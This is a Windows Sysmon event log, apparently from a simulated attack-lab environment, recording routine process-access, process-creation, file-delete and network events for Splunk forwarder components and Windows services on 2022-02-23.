11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-13DD-6216-A004-000000003902}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13DD-6216-A004-000000003902}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-13DD-6216-A004-000000003902}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.372{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61FB60B0CFB84358522B04507728F09,SHA256=D4703E01BB773D8978C6DB0746B875E81B2339AFC360D8C4DD3F504DEA1190A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:46.387{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D8D906B23F4764F758273B8F1BAACB9,SHA256=BB1DCF0E7B5A3084865E50AFA67D04F276B1F561D620AB4F286B37B4283D0603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:46.217{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F163ABB8C8B97815ACB6D9638271A999,SHA256=2DF49F018CCED76210516DFA24A3891943DB144A0C4B4C1A293FF69544CC8508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:46.231{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13DF-6216-A204-000000003902}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-13DF-6216-A204-000000003902}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.731{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13DF-6216-A204-000000003902}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.732{4F8D34B0-13DF-6216-A204-000000003902}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.664{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51458-false10.0.1.12-8089- 10341000x8000000000000000218395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.450{4F8D34B0-13DF-6216-A104-000000003902}28881220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 